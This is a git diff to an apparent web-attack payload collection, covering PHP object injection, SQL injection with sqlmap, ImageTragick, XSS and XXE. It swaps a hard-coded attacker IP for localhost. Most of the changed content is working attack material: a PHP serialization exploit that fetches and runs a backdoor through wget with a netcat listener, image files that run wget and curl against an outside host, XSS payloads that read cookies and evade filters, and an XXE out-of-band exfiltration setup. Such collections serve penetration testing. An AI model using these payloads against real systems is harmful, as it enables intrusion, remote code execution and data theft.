diff --git a/PHP serialization/PHP-Serialization-RCE-Exploit.php b/PHP serialization/PHP-Serialization-RCE-Exploit.php index af0aae4..8ae88db 100755 --- a/PHP serialization/PHP-Serialization-RCE-Exploit.php +++ b/PHP serialization/PHP-Serialization-RCE-Exploit.php @@ -19,7 +19,7 @@ system('gnome-terminal -x sh -c \'nc -lvvp 4242\''); class PHPObjectInjection { // CHANGE URL/FILENAME TO MATCH YOUR SETUP - public $inject = "system('wget http://92.222.81.2/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');"; + public $inject = "system('wget http://127.0.0.1/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');"; } $url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER diff --git a/SQL injection/README.md b/SQL injection/README.md index 1a77614..4080da4 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -37,6 +37,13 @@ python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" The injection is located at the '*' ``` +Second order injection +``` +python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3 +sqlmap -r 1.txt -dbms MySQL -second-order "http:///joomla/administrator/index.php" -D "joomla" -dbs +``` + + General tamper option and tamper's list ``` tamper=name_of_the_tamper @@ -328,3 +335,6 @@ mysql> mysql> select version(); - [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html) - [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/) - [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/) +* Second Order: + - [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/) + - [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/) diff --git a/Upload insecure files/Image Tragik/payload_imageover_wget.gif b/Upload insecure files/Image Tragik/payload_imageover_wget.gif index 1c0ee01..b2dc7ad 100755 --- a/Upload insecure files/Image Tragik/payload_imageover_wget.gif +++ b/Upload insecure files/Image Tragik/payload_imageover_wget.gif @@ -1,4 +1,4 @@ push graphic-context viewbox 0 0 640 480 -image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 92.222.81.2:1337 > /dev/null`' +image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 127.0.0.1:1337 > /dev/null`' pop graphic-context diff --git a/Upload insecure files/Image Tragik/payload_url_curl.png b/Upload insecure files/Image Tragik/payload_url_curl.png index a215d25..633b15b 100755 --- a/Upload insecure files/Image Tragik/payload_url_curl.png +++ b/Upload insecure files/Image Tragik/payload_url_curl.png @@ -1,4 +1,4 @@ push graphic-context viewbox 0 0 640 480 -fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "92.222.81.2)' +fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "127.0.0.1)' pop graphic-context diff --git a/XSS injection/README.md b/XSS injection/README.md index 1325bc6..48a3690 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -83,26 +83,6 @@ With an additional URL ``` -XSS in flash application -``` -flashmediaelement.swf?jsinitfunctio%gn=alert`1` -flashmediaelement.swf?jsinitfunctio%25gn=alert(1) -ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 -swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);// -swfupload.swf?buttonText=test&.swf -plupload.flash.swf?%#target%g=alert&uid%g=XSS& -moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true -video-js.swf?readyFunction=alert(1) -player.swf?playerready=alert(document.cookie) -player.swf?tracecall=alert(document.cookie) -banner.swf?clickTAG=javascript:alert(1);// -io.swf?yid=\"));}catch(e){alert(1);}// -video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29 -bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 -flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// -phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// -``` - XSS in Hidden input ``` @@ -159,6 +139,7 @@ XSS with data: ``` data:text/html, data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ + ``` XSS with vbscript: only IE @@ -200,7 +181,7 @@ XSS in SVG (short) </title><script>alert(3)</script> ``` -XSS in SWF +XSS in SWF flash application ``` Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} @@ -213,10 +194,30 @@ open url to new window: InsecureFlashFile.swf?a=open&c=http://www.google.com/ http request to url: InsecureFlashFile.swf?a=get&c=http://www.google.com/ eval js codz: InsecureFlashFile.swf?a=eval&c=alert(document.domain) ``` - more payloads in ./files +XSS in SWF flash application +``` +flashmediaelement.swf?jsinitfunctio%gn=alert`1` +flashmediaelement.swf?jsinitfunctio%25gn=alert(1) +ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 +swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);// +swfupload.swf?buttonText=test&.swf +plupload.flash.swf?%#target%g=alert&uid%g=XSS& +moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true +video-js.swf?readyFunction=alert(1) +player.swf?playerready=alert(document.cookie) +player.swf?tracecall=alert(document.cookie) +banner.swf?clickTAG=javascript:alert(1);// +io.swf?yid=\"));}catch(e){alert(1);}// +video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29 +bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 +flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// +phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// +``` + + ## XSS with Relative Path Overwrite - IE 8/9 and lower @@ -412,6 +413,17 @@ javascript://-->*/alert()/* ``` +Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514) +![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg) +``` +-->'"/> +``` +![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large) +``` + ``` -Bypass using an alternate way to execute an alert +Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) ``` - - - - - - - +window['alert'](0) +parent['alert'](1) +self['alert'](2) +top['alert'](3) +this['alert'](4) +frames['alert'](5) +content['alert'](6) +[7].map(alert) +[8].find(alert) +[9].every(alert) +[10].filter(alert) +[11].findIndex(alert) +[12].forEach(alert); ``` Bypass using an alternate way to trigger an alert @@ -677,3 +695,5 @@ Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermissi * http://d3adend.org/xss/ghettoBypass * http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html * http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html +* https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5 +* https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309 diff --git a/XXE injections/README.md b/XXE injections/README.md index ed8cf4e..7333d5b 100644 --- a/XXE injections/README.md +++ b/XXE injections/README.md @@ -125,15 +125,15 @@ XXE OOB with DTD and PHP filter - + %sp; %param1; ]> &exfil; -File stored on http://92.222.81.2/dtd.xml +File stored on http://127.0.0.1/dtd.xml -"> +"> ``` XXE Inside SOAP